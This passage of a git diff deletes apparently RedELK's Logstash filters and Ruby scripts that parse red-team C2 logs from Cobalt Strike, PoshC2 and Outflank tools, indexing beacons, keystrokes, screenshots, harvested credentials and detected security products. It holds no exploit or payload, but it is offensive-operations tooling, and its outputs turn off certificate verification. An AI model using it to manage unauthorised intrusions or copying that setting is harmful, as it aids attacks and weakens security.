stage1Uid\:(?<[implant][id]>([^;]*)); taskUid\:(?<[implant][task_id]>([^;]*)); taskRequest\:(?<[implant][task]>([^;]*)); taskRequestparameters\:(?<[implant][task_parameters]>([^;]*)); taskResponse\:(?<[implant][output]>(.|\r|\n)*);"} - } - - # Check if if there was a file downloaded - if "taskResponse: Downloaded " in [c2][message] { - clone { - clones => ["downloads"] - } - - if "downloads" in [type] { - # clean up the fields - remove type and c2logtype, and add c2logtype as downloads - mutate { - remove_field => ["type", "[c2][log][type]"] - } - mutate { - add_field => { "[c2][log][type]" => "downloads" } - } - - # Matching lines like: Downloaded C:\Users\ieuser.CONTOSO\Desktop\Stage1-Syscall_x64_Release.exe 305 kb [1592230528_125IJU9I] Stage1-Syscall_x64_Release.exe; - grok { - match => { "implant_output" => " Downloaded (?<[file][path]>(.|\r|\n)*) %{INT} (kb|mb|b|gb) \[(?<[file][directory_local]>([^\]]*))] (?<[file][name]>([^\;]*));" } - } - - # Add path/URI value to the full implant.log file - ruby { - path => "/usr/share/logstash/redelk-main/scripts/outflankstage1_makedownloadspath.rb" - } - } - } - } - - # Add path/URI value to the full implant.log file - ruby { - path => "/usr/share/logstash/redelk-main/scripts/outflankstage1_makelogpath.rb" - } - - } - } -} \ No newline at end of file diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf deleted file mode 100644 index e0084268..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf +++ /dev/null @@ -1,393 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash filtes for CobaltStrike teamserver logs -# -# Author: Outflank B.V. / Marc Smeets -# Contributor: Lorenzo Bernardi -# - -filter { - if [infra][log][type] == "rtops" and [c2][program] == "cobaltstrike" { - - # since ECS host.name is filled automatically. In case of C2 server logs it should contain the same value as agent.name. Here we check and drop host.name - if [agent][name] == [host][name] { - mutate { - remove_field => [ "[host][name]" ] - } - } - - # Get the timestamp from the log line, and get the rest of the log line to c2.message - grok { - match => { "message" => "(?<[c2][timestamp]>%{MONTHNUM}\/%{MONTHDAY} %{TIME}) UTC( |\t)%{GREEDYDATA:[c2][message]}" } - } - # Set the timestamp from the log to @timestamp - date { - match => [ "[c2][timestamp]", "MM/dd HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - - - # - # Cobalt Strike event log - # Parsed by filebeat as c2.log.type:events - # - if [c2][log][type] == "events" { - # matching lines like: *** initial beacon from username@ip (hostname) - if " initial beacon from " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "events_newimplant" } - } - - grok { - match => { "[c2][message]" => "((/*** initial beacon from)) (?<[user][name]>([^@]*))\@%{IPORHOST:[host][ip_int]} \((?<[host][name]>([^)]*))" } - } - } - - # matching lines like: *** user joined - if " joined" in [c2][message] or " quit" in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "events_joinleave" } - } - - grok { - match => { "[c2][message]" => [ - "\*\*\* (?<[c2][operator]>([^\()]*)) \(%{IP:[c2][operator_ip]}\) joined", - "\*\*\* %{GREEDYDATA:[c2][operator]} quit" - ]} - } - } - } - - - # - # Cobalt Strike beacon log - # Parsed by filebeat as c2.log.type:beacon - # - if [c2][log][type] == "beacon" { - # Add path/URI value to the full beacon.log file - ruby { - path => "/usr/share/logstash/redelk-main/scripts/cs_makebeaconlogpath.rb" - } - - # Set the beacon id from the file name - # Need to match for 3 different occurence: - # - one where it states 'unknown'. - # - where the IP address is known based on the file name with beacon_* - # - where the IP address is known based on the file name with ssh_* - - # It is expected that the logs are in the default subdirectory of the folder cobaltstrike: /cobaltstrike/logs/ - grok { - match => { "[log][file][path]" => [ - "/cobaltstrike/logs/((\d{6}))/unknown/(beacon|ssh)_(?<[implant][id]>(\d{1,10}))", - "/cobaltstrike/logs/((\d{6}))/%{IPORHOST:[host][ip_int]}/(beacon|ssh)_(?<[implant][id]>(\d{1,10}))" - ] } - } - - # matching lines like: [metadata] 1.2.3.4 <- 10.10.10.10; computer: SomeComputername; user: SomeUsername; pid: 7368; os: Windows; version: 6.1; beacon arch: x86 - # todo: this could go wrong if targetip is not an ip but a smb/TCP beacon (can list the beacon session id instead of ip address..? In such case also set the beacon_link value to true - if "[metadata] " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_newimplant" } - } - # need to match 3 types of lines: - # - regular HTTP(S) beacon where the ext IP field is an IP - # - SMB/TCP beacons where the ext IP field is a field like "beacon_12345" - # - SSH beacons - grok { - match => { "[c2][message]" => [ - "[metadata](([^\s]*)) %{IPORHOST:[host][ip_ext]} (([^\s]*)) %{IPORHOST}((\; computer:)) (?<[host][name]>([^\;]*))((\; user:)) (?<[user][name]>([^\;]*))((\; process:)) (?<[process][name]>([^\;]*))((\; pid:)) (?<[process][pid]>([^\;]*))((\; os:)) (?<[host][os][name]>([^\;]*))((\; version:)) (?<[host][os][version]>([^\;]*))(((\; build:)) (?<[host][os][kernel]>([^\;]*)))?((\; beacon arch:)) (?<[implant][arch]>([^\;]*))", - "[metadata](([^\s]*)) beacon_%{NUMBER:[implant][parent_id]} (([^\s]*)) %{IPORHOST}((\; computer:)) (?<[host][name]>([^\;]*))((\; user:)) (?<[user][name]>([^\;]*))((\; process:)) (?<[process][name]>([^\;]*))((\; pid:)) (?<[process][pid]>([^\;]*))((\; os:)) (?<[host][os][name]>([^\;]*))((\; version:)) (?<[host][os][version]>([^\;]*))(((\; build:)) (?<[host][os][kernel]>([^\;]*)))?((\; beacon arch:)) (?<[implant][arch]>([^\;]*))", - "[metadata](([^\s]*)) beacon_%{NUMBER:[implant][parent_id]} (([^\s]*)) %{IPORHOST}((\; computer:)) (?<[host][name]>([^\;]*))((\; user:)) (?<[user][name]>([^\;]*))((\; os:)) (?<[host][os][name]>([^\;]*))" - ]} - } - - # Now duplicate fileds host.ip_ext and host.ip_int to host.ip to adhere to ECS. - if [host][ip_int] { - mutate { - add_field => { "[host][ip]" => "%{[host][ip_int]}" } - } - } - if [host][ip_ext] { - mutate { - add_field => { - "[host][domain_ext]" => "%{[host][ip_ext]}" - "[host][ip]" => "%{[host][ip_ext]}" - } - } - # do reverse DNS lookup - dns { - reverse => ["[host][domain_ext]"] - action => "replace" - timeout => "2.0" - } - # add geo ip info from City DB - geoip { - source => "[host][ip_ext]" - target => "tmpgeoip" - } - # add geo ip info from ASN DB - geoip { - source => "[host][ip_ext]" - target => "tmpgeoip" - default_database_type => "ASN" - } - mutate { - copy => { - "[tmpgeoip][as_org]" => "[host][geo][as][organization][name]" - "[tmpgeoip][asn]" => "[host][geo][as][organization][number]" - "[tmpgeoip][city_name]" => "[host][geo][city_name]" - "[tmpgeoip][country_code2]" => "[host][geo][country_iso_code]" - "[tmpgeoip][location]" => "[host][geo][location]" - "[tmpgeoip][region_code]" => "[host][geo][region_iso_code]" - "[tmpgeoip][region_name]" => "[host][geo][region_name]" - } - remove_field => [ "tmpgeoip" ] - } - } - - # now duplicate this specific log line, remove some irrelevant fields and make it ready to store in the implantsdb index (different output) - clone { - clones => [ "implantsdb" ] - remove_field => [ "[c2][log][type]","[c2][message]","[infra][log][type]" ] - } - # Now set beacon link information if its a linked beacon. - if [implant][parent_id] { - mutate { - add_field => { "[implant][linked]" => "true" } - add_field => { "[implant][link_mode]" => "child" } - } - } - - } - - # matching lines like: [task] Tasked beacon to sleep for 3600s (20% jitter) - if "[task] " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_task" } - } - - grok { - match => { "[c2][message]" => "(([^\s]*)) %{GREEDYDATA:[implant][task]}" } - } - - # The task log line can contain MITRE ATT&CK numbers of the task that is about to be performed. - # Example: [task] Tasked beacon to take screenshot - # Here we check if '' are in c2.message. If so, we parse the field. - # We also check if there are multiple values, and if so split them up - if "" in [implant][task] { - grok { - match => { "[implant][task]" => "<(?<[threat][technique][id]>([^\>]*))> " } - } - mutate { - split => { "[threat][technique][id]" => ", " } - } - } - } - - # matching lines like: [checkin] host called home, sent: 16 bytes - if "[checkin] " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_checkin" } - } - - grok { - match => { "[c2][message]" => "(([^\s]*)) %{GREEDYDATA:[implant][checkin]}" } - } - } - - # matching lines like: [input] note s3600 20 - if "[input] " in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_input" } - } - - grok { - match => { "[c2][message]" => "(([^\s]*)) (<%{GREEDYDATA:[implant][operator]}>)? %{GREEDYDATA:[implant][input]}" } - } - } - - # matching lines like: [indicator] SomethingSomething - if "[indicator]" in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "ioc" } - } - - # need to match 2 types of lines: one for file and one for service indicators - grok { - match => { "[c2][message]" => [ - "((^\[indicator\])) (?<[ioc][type]>([^\:]*))((:)) %{NOTSPACE:[file][hash][md5]} %{POSINT:[file][size]} ((bytes)) %{GREEDYDATA:[file][name]}", - "((^\[indicator\])) (?<[ioc][type]>([^\:]*))((:)) %{WINPATH:[file][path]} %{NOTSPACE:[file][name]}" - ]} - } - } - - # matching lines like: [output]\nSomethingSomething - if "[output]" in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_output" } - } - - grok { - match => { "[c2][message]" => "]\n%{GREEDYDATA:[implant][output]}" } - } - - # check for messages like: established link to parent beacon: 1.2.3.4 - # todo: add check for recursive smb/TCP beacons (child becomes another beacon's parent). For now this parent-child indication is wrong when a child becomes a parent of another linked beacon - # Done: using parent_id or child_id depending on the relation (beacon can have a parent and a child). Note that a parent beacon can have multiple child beacons, which only the latest will be registered. - if "established link to parent beacon" in [implant][output] { - grok { - match => { "[implant][output]" => "((established link to parent beacon: ))%{IPORHOST:[implant][parent_id]}" } - add_field => { "[implant][linked]" => "true" } - # add_field => { "[implant][link_mode]" => "child" } - } - } - if "established link to child beacon" in [implant][output] { - grok { - match => { "[implant][output]" => "((established link to child beacon: ))%{IPORHOST:[implant][child_id]}" } - add_field => { "[implant][linked]" => "true" } - # add_field => { "[implant][link_mode]" => "child" } - } - } - - # Leaving this in here for legacy as screenshot logging changed in CS4.2. - # check for received screenshots and add a path value to the screenshot - if "received screenshot (" in [implant][output] { - ruby { - path => "/usr/share/logstash/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb" - } - } - } - - # matching lines like: [error]\nSomethingSomething - if "[error]" in [c2][message] { - mutate { - replace => { "[c2][log][type]" => "implant_error" } - } - - grok { - match => { "[c2][message]" => "]%{GREEDYDATA:[implant][output]}" } - } - } - } - - - # - # Cobalt Strike screenshots log - # Parsed by filebeat as c2.log.type:screenshots - # - # This is for CS4.2 and later parsing of screenshot data. Since CS4.2 there is a dedicated screenshots.log file. Before CS4.2 it was parsed from regular beacon log - if [c2][log][type] == "screenshots" { - # Matching lines like: 11/06 21:07:30 UTC MARCS-TEST 1 marcs screen_30efde80_1518442534.jpg - grok { - match => { "[c2][message]" => "(?<[host][name]>([^\s]*))\s(?<[screenshot][desktop_session]>([^\t]*))\t(?<[user][name]>([^\t]*))\t(?<[screenshot][file_name]>([^\t]*))\t(%{GREEDYDATA:[screenshot][title]})" } - } - grok { - match => { "[screenshot][file_name]" => "screen_([^_]*)_(?<[implant][id]>(\d{1,10}))"} - } - - # add url to screenshot files (full and thumb) - ruby { - path => "/usr/share/logstash/redelk-main/scripts/cs_makescreenshotpath.rb" - } - } - - - # - # Cobalt Strike keystrokes log - # Parsed by filebeat as c2.log.type:keystrokes - # - if [c2][log][type] == "keystrokes" { - # Set the beacon id from the file name - # Need to match for 2 different occurence, one where the IP address is known based on the file name, and one where it states 'unknown'. - # It is expected that the logs are in the default subdirectory of the folder cobaltstrike: /cobaltstrike/logs/ - grok { - match => { "[log][file][path]" => [ - "/cobaltstrike/logs/((\d{6}))/unknown/keystrokes/keystrokes_(?<[implant][id]>(\d{0,10}))", - "/cobaltstrike/logs/((\d{6}))/%{IPORHOST:[host][ip_int]}/keystrokes/keystrokes_(?<[implant][id]>(\d{1,10}))" - ]} - } - - # In CS 4.2 the log line inside the keystroke file changed. We now have two possible matches: - # 1. 11/13 10:15:32 UTC Received keystrokes from marc in desktop 2 - # 2. 10/02 11:17:31 UTC Received keystrokes - pre CS 4.2 - if " from " in [c2][message] and " in desktop " in [c2][message] { - grok { - match => { "[c2][message]" => "Received keystrokes from %{GREEDYDATA:[keystrokes][user]} in desktop %{INT:[keystrokes][desktop_session]}" } - } - ruby { - path => "/usr/share/logstash/redelk-main/scripts/cs_makekeystrokespath.rb" - } - } else { - ruby { - path => "/usr/share/logstash/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb" - } - } - } - - - # - # Cobalt Strike downloads log - # Parsed by filebeat as c2.log.type:downloads - # - if [c2][log][type] == "downloads" { - # matching lines like: 05/25 13:29:44 UTC 192.168.217.131 93439 70 /root/cobaltstrike/downloads/2914cdfa8 helloworld.ps1 C:\users\marcs\Desktop\ - grok { - match => { "[c2][message]" => "%{IP:[host][ip_int]}(\t)(?<[implant][id]>(\d{0,10}))(\t)%{INT}(\t)%{NOTSPACE:[file][directory_local]}(\t)(?<[file][name]>([^\t]*))(\t)%{GREEDYDATA:[file][directory]}" } - } - - # add url to full downloads file - ruby { - path => "/usr/share/logstash/redelk-main/scripts/cs_makedownloadspath.rb" - } - } - - - - # - # Cobalt Strike credentials log - # Parsed by filebeat as c2.log.type:credentials - # - if [c2][log][type] == "credentials" { - # Drop the first line with headers - if "#User" in [message] { - drop { } - } - - #Parse the lines with credentials - grok { - match => { "message" => "(?<[creds][realm]>([^\\]*))\\(?<[creds][username]>([^\t]*))\t(?<[creds][credential]>([^\t]*))\t(?<[creds][host]>([^\t]*))\t(?<[creds][source]>([^\t]*))" } - } - } - - - # - # Generic tidy up things below - # - # Add data about OS for nice display - if [host][os][kernel] and [c2][log][type] != "credentials" { - mutate { - add_field => { - "[host][os][family]" => "%{[host][os][name]}" - "[host][os][platform]" => "%{[host][os][name]}" - "[host][os][full]" => "%{[host][os][family]} %{[host][os][version]} (build %{[host][os][kernel]})" - } - } - } - - # Add metadata for SIEM - mutate { - add_field => { - "[event][kind]" => "event" - "[event][category]" => "host" - "[event][module]" => "redelk" - "[event][dataset]" => "c2" - "[event][action]" => "%{[c2][log][type]}" - } - copy => { - "[c2][log][type]" => "[event][type]" - } - } - - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf deleted file mode 100644 index d9a4f538..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf +++ /dev/null @@ -1,122 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash filters for PoshC2 logs -# -# Author: Outflank B.V. / Marc Smeets / @benpturner - Ben Turner -# Contributor: Lorenzo Bernardi -# - -filter { - if [infra][log][type] == "rtops" and [c2][program] == "poshc2" { - - if [c2][log][type] == "events" { - - # Let's first trim the syslog-like info from the log line - grok { - match => { "message" => [ ".*" ] } - } - - # matching lines like: *** initial implant - if "PID:" in [message] and "Sleep:" in [message] { - - mutate { - replace => { "[c2][log][type]" => "implant_newimplant" } - } - - grok { - match => { "message" => "%{IPORHOST:[host][ext_ip]}\:%{IPORHOST:[host][port]}\s+\|\s+Time:%{GREEDYDATA:[c2][timestamp]}\s+\|\s+PID:%{IPORHOST:[process][pid]}\s+\|\s+Sleep:%{GREEDYDATA:[implant][sleep]}\s+\|\s+%{GREEDYDATA:[user][name]}\s+@\s+%{GREEDYDATA:[host][name]}\s+\(%{GREEDYDATA:[implant][arch]}\)\s+\|\s+URL\:%{GREEDYDATA:[implant][url]}" } - } - - if [host][ext_ip] { - # duplicate field so we can replace it with reverse DNS lookup and add the external IP to [host][ip] - mutate { - add_field => { "[host][ext_domain]" => "%{[host][ext_ip]}" } - copy => { "[host][ext_ip]" => "[host][ip]" } - } - # do reverse DNS lookup - dns { - reverse => ["[host][ext_domain]"] - action => "replace" - timeout => "2.0" - } - # add geo ip info from City DB - geoip { - source => "[host][ext_ip]" - target => "tmpgeoip" - } - # add geo ip info from ASN DB - geoip { - source => "[host][ext_ip]" - target => "tmpgeoip" - default_database_type => "ASN" - } - mutate { - copy => { - "[tmpgeoip][as_org]" => "[host][geo][as][organization][name]" - "[tmpgeoip][asn]" => "[host][geo][as][organization][number]" - "[tmpgeoip][city_name]" => "[host][geo][city_name]" - "[tmpgeoip][country_code2]" => "[host][geo][country_iso_code]" - "[tmpgeoip][location]" => "[host][geo][location]" - "[tmpgeoip][region_code]" => "[host][geo][region_iso_code]" - "[tmpgeoip][region_name]" => "[host][geo][region_name]" - } - remove_field => [ "tmpgeoip" ] - } - } - - date { - match => [ "[c2][timestamp]", "dd/MM/YYYY HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - - clone { - clones => [ "implantsdb" ] - remove_field => [ "[c2][log][type]","message","[infra][log_type]" ] - } - - } - - # matching lines like: *** Screenshot captured: - if "Screenshot captured:" in [message] { - - mutate { - replace => { "[c2][log][type]" => "screenshots" } - } - - grok { - # Screenshot.full expects and URL, if the full screenshot is saved then the index needs to be updated to accomodate it - match => { "message" => "Screenshot\s+captured:\s+%{GREEDYDATA:[screenshot][full]}" } - } - - } - - # matching lines like: *** Download: - if "Download file" in [message] { - - mutate { - replace => { "[c2][log][type]" => "downloads" } - } - - grok { - match => { "message" => "Download\s+file\s+part\s+%{GREEDYDATA:[file][path]}" } - } - - } - - # matching lines like: *** Messages: - if "Message from" in [message] or "logged off" in [message] or "logged on" in [message] { - - mutate { - replace => { "[c2][log][type]" => "messages" } - } - - grok { - match => { "message" => "(0[1-9]|[12]\d|3[01])/(0[1-9]|1[0-2])/[12]\d{3}\s+([0-1][0-9]|[2][0-3]):([0-5][0-9]):([0-5][0-9]):%{GREEDYDATA:[c2][message]}" } - } - - } - - } - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/70-filter-pstools_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/70-filter-pstools_logstash.conf deleted file mode 100644 index 7c0b0675..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/70-filter-pstools_logstash.conf +++ /dev/null @@ -1,63 +0,0 @@ -# Part of RedELK -# -# In this file we parse the output of the PS-Tools suite by Outflank / @Cn33liz -# This may or may not work with the latest public version ! -# -# More info on PS-Tools at https://outflank.nl/blog/2020/03/11/red-team-tactics-advanced-process-monitoring-techniques-in-offensive-operations/ -# and downloads at https://github.com/outflanknl/Ps-Tools -# -# Author: Outflank B.V. / Marc Smeets -# - -filter { - if [infra][log][type] == "rtops" and "PStoolsStart" in [c2][message] { - grok { - match => { "[c2][message]" => "\[PStoolsStart\]\n\n(?<[pstools][full_output]>(.|\r|\n)*)" } - } - - # Determine the type of PSTool - if "Output from Outflank PSX" in [pstools][full_output] { - grok { - match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{GREEDYDATA:[pstools][tool]}\)\n\n(?<[pstools][psx][processes]>(.|\r|\n)*)\n\n((-)+)\n(?<[pstools][psx][security_products]>(.|\r|\n)*)\n\n((-)+)\n(?<[pstools][psx][summary]>(.|\r|\n)*)\[PStoolsEnd\]" } - } - - if [pstools][psx][security_products] { - grok { - match => { "[pstools][psx][security_products]" => "%{GREEDYDATA}Vendor:\t (?<[pstools][psx][edr_name]>(.|\r|\n)*)" } - } - # clean up the tab and "Product" string - mutate { - gsub => ["[pstools][psx][edr_name]", "\n Product:\t", " -"] - } - # now duplicate this specific log line to record into bluecheck index - remove useless info for that index - # also copy the value from [pstools][psx][security_products] to [message] - clone { - clones => [ "bluecheck" ] - remove_field => [ "[agent][ephemeral_id]","[agent][hostname]","[agent][id]","[agent][name]","[agent][type]","[agent][version]","[c2][log][type]","[c2][message]","[c2][program]","[c2][timestamp]","[event][action]","[event][category]","[event][dataset]","[event][end]","[event][enriched_from]","[event][ingested]","[event][kind]","[event][module]","[event][start]","[host]","[implant][output]","[infra][log][type]","[input][type]","[log][file][path]","[log][flags]","[log][offset]","[message]","[process][name]","[process][pid]","[pstools][full_output]","[pstools][psx][processes]","[pstools][psx][summary]","[user][name]" ] - add_field => { "[message]" => "%{[pstools][psx][security_products]}" } - } - } - - } else if "Output from Outflank PSK" in [pstools][full_output] { - grok { - match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][header]}\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } - } - } else if "Output from Outflank PSC" in [pstools][full_output] { - grok { - match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } - } - } else if "Output from Outflank PSM" in [pstools][full_output] { - grok { - match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } - } - } else if "Output from Outflank PSH" in [pstools][full_output] { - grok { - match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } - } - } else if "Output from Outflank PSW" in [pstools][full_output] { - grok { - match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{WORD:[pstools][tool]} version %{NUMBER:[pstools][version]}\)\\n\\n%{GREEDYDATA:[pstools][items]}\[F\]%{GREEDYDATA:[pstools][footer]}" } - } - } - } -} \ No newline at end of file diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/99-outputs_logstash.conf b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/99-outputs_logstash.conf deleted file mode 100644 index cc4177ed..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/conf.d/99-outputs_logstash.conf +++ /dev/null @@ -1,103 +0,0 @@ -# Part of RedELK -# -# In this file we configure the logstash outputs -# -# Author: Outflank B.V. / Marc Smeets -# - -output { - if [infra][log][type] == "rtops" { - elasticsearch { - hosts => ["redelk-elasticsearch:9200"] - sniffing => true - manage_template => false - # ilm_enabled => true - # ilm_rollover_alias => "rtops" - # ilm_policy => "redelk" - # template_name => "rtops" - ilm_enabled => false - index => "rtops-%{+YYYY.MM.dd}" - user => ["redelk_ingest"] - password => ["${CREDS_redelk_ingest}"] - ssl => true - cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" - ssl_certificate_verification => false - } - } - - if [type] == "implantsdb" { - elasticsearch { - hosts => ["redelk-elasticsearch:9200"] - sniffing => true - manage_template => false - ilm_enabled => false - index => "implantsdb" - user => ["redelk_ingest"] - password => ["${CREDS_redelk_ingest}"] - ssl => true - cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" - ssl_certificate_verification => false - } - } - - if [infra][log][type] == "redirtraffic" { - elasticsearch { - hosts => ["redelk-elasticsearch:9200"] - sniffing => true - manage_template => false - # ilm_enabled => true - # ilm_rollover_alias => "redirtraffic" - # ilm_policy => "redelk" - # template_name => "redirtraffic" - ilm_enabled => false - index => "redirtraffic-%{+YYYY.MM.dd}" - user => ["redelk_ingest"] - password => ["${CREDS_redelk_ingest}"] - ssl => true - cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" - ssl_certificate_verification => false - } - } - - if [c2][log][type] == "credentials" { - elasticsearch { - hosts => ["redelk-elasticsearch:9200"] - sniffing => true - manage_template => false - index => "credentials-%{+YYYY.MM.dd}" - user => ["redelk_ingest"] - password => ["${CREDS_redelk_ingest}"] - ssl => true - cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" - ssl_certificate_verification => false - } - } - - if [type] == "bluecheck" { - elasticsearch { - hosts => ["redelk-elasticsearch:9200"] - sniffing => true - manage_template => false - index => "bluecheck-%{+YYYY.MM.dd}" - user => ["redelk_ingest"] - password => ["${CREDS_redelk_ingest}"] - ssl => true - cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" - ssl_certificate_verification => false - } - } - - if [infralogtype] == "email" { - elasticsearch { - hosts => ["redelk-elasticsearch:9200"] - sniffing => true - manage_template => false - index => "email-%{+YYYY.MM.dd}" - user => ["redelk_ingest"] - password => ["${CREDS_redelk_ingest}"] - ssl => true - cacert => "${CERTS_LOGSTASH_OUTPUT_CA}" - ssl_certificate_verification => false - } - } -} diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makebeaconlogpath.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makebeaconlogpath.rb deleted file mode 100644 index 15da449c..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makebeaconlogpath.rb +++ /dev/null @@ -1,18 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert an extra field pointing to the full TXT file of a Cobalt Strike keystrokes file -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - implant_id = event.get("[implant][id]") - temppath = logpath.split('/cobaltstrike') - temppath2 = temppath[1].split(/\/([^\/]*)$/) - implantlogpath = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath[1]}" - event.tag("_rubyparseok") - event.set("[implant][log_file]", implantlogpath) - return [event] -end diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makedownloadspath.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makedownloadspath.rb deleted file mode 100644 index 2596ec19..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makedownloadspath.rb +++ /dev/null @@ -1,20 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert an extra field pointing to the Cobalt Strike downloaded file -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - implant_id = event.get("[implant][id]") - filename = event.get("[file][name]") - file_path = event.get("[file][directory_local]") - file_patharray = file_path.split(/\/([^\/]*)$/) - file_id = file_patharray[-1] - downloadsurl = "/c2logs/" + "#{host}" + "/cobaltstrike/downloads/" + "#{file_id}" + "_" + "#{filename}" - event.tag("_rubyparseok") - event.set("[file][url]", downloadsurl) - return [event] -end diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath.rb deleted file mode 100644 index 050ccc4c..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath.rb +++ /dev/null @@ -1,20 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert an extra field pointing to the full TXT file of a Cobalt Strike keystrokes file -# Cobalt Strike 4.2 and higher -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - implant_id = event.get("[implant][id]") - desktop_session = event.get("[keystrokes][desktop_session]") - temppath = logpath.split('/cobaltstrike') - temppath2 = temppath[1].split(/\/([^\/]*)$/) - keystrokespath = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/keystrokes_" + "#{implant_id}" + "." + "#{desktop_session}" + ".txt" - event.tag("_rubyparseok") - event.set("[keystrokes][url]", keystrokespath) - return [event] -end diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb deleted file mode 100644 index a599c7aa..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb +++ /dev/null @@ -1,19 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert an extra field pointing to the full TXT file of a Cobalt Strike keystrokes file -# Before Cobalt Strike 4.2 -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - implant_id = event.get("[implant][id]") - temppath = logpath.split('/cobaltstrike') - temppath2 = temppath[1].split(/\/([^\/]*)$/) - keystrokespath = "/c2logs/" + "#{host}" + "/cobaltstrike" + "#{temppath2[0]}" + "/keystrokes_" + "#{implant_id}" + ".txt" - event.tag("_rubyparseok") - event.set("[keystrokes][url]", keystrokespath) - return [event] -end diff --git a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath.rb b/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath.rb deleted file mode 100644 index 5ac0622e..00000000 --- a/elkserver/docker/redelk-logstash/redelkinstalldata/redelk-main/scripts/cs_makescreenshotpath.rb +++ /dev/null @@ -1,21 +0,0 @@ -# -# Part of RedELK -# Script to have logstash insert extra fields pointing to the Cobalt Strike screenshots -# Cobalt Strike 4.2 and higher -# -# Author: Outflank B.V. / Marc Smeets -# - -def filter(event) - host = event.get("[agent][name]") - logpath = event.get("[log][file][path]") - filename = event.get("[screenshot][file_name]") - temppath = 